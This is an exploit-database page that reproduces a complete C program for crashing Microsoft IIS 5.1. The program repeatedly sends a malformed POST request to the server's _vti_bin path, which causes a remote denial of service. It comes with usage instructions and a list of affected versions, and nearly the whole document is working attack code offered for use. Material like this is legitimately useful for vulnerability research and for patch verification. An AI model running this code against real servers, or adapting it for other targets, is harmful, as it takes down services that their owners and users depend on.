Vulners
Lucene search
MS Windows IIS Malformed HTTP Request Denial of Service Exploit (c)
===================================================================
MS Windows IIS Malformed HTTP Request Denial of Service Exploit (c)
===================================================================
/*****************************************************************
Microsoft IIS 5.1 Remote D.o.S Exploit by Kozan
Application: Microsoft IIS (Internet Information Server)
Vendor: Microsoft - http://www.microsoft.com/
Discovered by: Inge Henriksen
Exploit Coded by: Kozan
Credits to ATmaCA, Inge Henriksen
Web: www.spyinstructors.com
Mail: [email protected]
Vulnerable:
Microsoft? Internet Information Server? V5.1
Not vulnerable:
Microsoft? Internet Information Server? V5.0
Microsoft? Internet Information Server? V6.0
Only folders with Execute Permissions set to 'Scripts & Executables'
are affected, such as the '_vti_bin' directory.
inetinfo.exe will be crashed after exploitation finished successfuly.
Usage: iis51dos.exe [Target Url or IP]
*****************************************************************/
#include <winsock2.h>
#include <stdio.h>
#include <windows.h>
#pragma comment(lib, "ws2_32.lib")
char *HttpHeader(char *pszHost)
{
char szHeader[1000];
wsprintf( szHeader, "POST /_vti_bin/.dll/*/~0 HTTP/1.1\r\n"
"Content-Type: application/x-www-form-urlencoded\r\n"
"Host: %s\r\n"
"Content-Length: 0\r\n\r\n"
, pszHost
);
return szHeader;
}
int main(int argc, char *argv[])
{
fprintf(stdout, "\n\nMicrosoft IIS 5.1 Remote D.o.S Exploit by Kozan\n"
"Bug Discovered by: Inge Henriksen\n"
"Exploit Coded by: Kozan\n"
"Credits to ATmaCA, Inge Henriksen\n"
"www.spyinstructors.com - [email protected]\n\n"
);
if( argc != 2 )
{
fprintf(stderr, "\n\nUsage:\t%s [WebSiteUrl]\n\n", argv[0]);
return -1;
}
WSADATA wsaData;
struct hostent *pTarget;
struct sockaddr_in addr;
SOCKET sock;
char szHeader[1000], szWebUrl[1000];
lstrcpy(szWebUrl, argv[1]);
lstrcpy(szHeader, HttpHeader(szWebUrl));
if( WSAStartup(0x0101,&wsaData) < 0 )
{
fprintf(stderr, "Winsock error!\n");
return -1;
}
sock = socket(AF_INET,SOCK_STREAM,0);
if( sock == -1 )
{
fprintf(stderr, "Socket error!\n");
return -1;
}
if( (pTarget = gethostbyname(szWebUrl)) == NULL )
{
fprintf(stderr, "Address resolve error!\n");
return -1;
}
memcpy(&addr.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length);
addr.sin_family = AF_INET;
addr.sin_port = htons(80);
memset(&(addr.sin_zero), '\0', 8);
fprintf(stdout, "Please wait while connecting...\n");
if( connect( sock, (struct sockaddr*)&addr, sizeof(struct sockaddr) ) == -1 )
{
fprintf(stderr, "Connection failed!\n");
closesocket(sock);
return -1;
}
fprintf(stdout, "Connected.\n\n");
fprintf(stdout, "Please wait while sending DoS request headers...\n\n");
for( int i=0; i<4; i++ )
{
fprintf(stdout, "Sending %d. request...\n", i+1);
if( send(sock, szHeader, lstrlen(szHeader),0) == -1 )
{
fprintf(stderr, "%d. DoS request header could not sent!\n", i+1);
closesocket(sock);
return -1;
}
fprintf(stdout, "%d. request sent.\n\n", i+1);
}
fprintf(stdout, "Operation completed...\n");
closesocket(sock);
WSACleanup();
return 0;
}
# 0day.today [2018-01-08] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
19 Dec 2005 00:00Current
7High risk
Vulners AI Score7